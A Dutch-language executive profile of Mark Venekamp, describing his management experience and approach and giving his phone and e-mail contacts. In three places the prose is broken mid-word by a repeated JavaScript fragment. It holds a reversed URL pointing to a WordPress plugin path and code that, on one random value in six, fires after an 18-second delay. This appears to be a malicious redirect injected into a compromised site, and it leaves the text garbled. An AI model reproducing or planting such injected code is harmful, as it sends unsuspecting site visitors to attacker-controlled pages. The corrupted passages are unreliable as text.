Mark Venekamp

‘Een ambitieuze realist en cultuurbewuste mensen-manager’

Mark is een ervaren senior executive met meer dan 15 jaar ervaring op zowel strategisch, operationeel als transformatie en crisismanagement niveau. Hij heeft een track record in het creëren van commerciële groei, cultuurverandering en operational excellence binnen kleine, middelgrote en grote profit en non-profit ondernemingen, die nationaal en internationaal actief zijn. In een aantal marktsectoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toren, waaronder Zorg, Services, Technology en Production.

Het is zijn passie om de verborgen talenten en potentie binnen organisaties, teams en individuen vrij te maken, waardoor de resultaten op alle gebieden blijvend verbeteren. Werkt met een benadering die in de kern neerkomt op ‘succesvolle mensen in succesvolle organisaties’, met toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toegevoegde waarde als kompas. Energieke katalysatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor met heldere en directe presentatie. Weet als ervaren wedstrijdzeiler ook in harde tegenwind vooruitgang te boeken.

M +31 655 737 776

E markvenekamp@tanera.com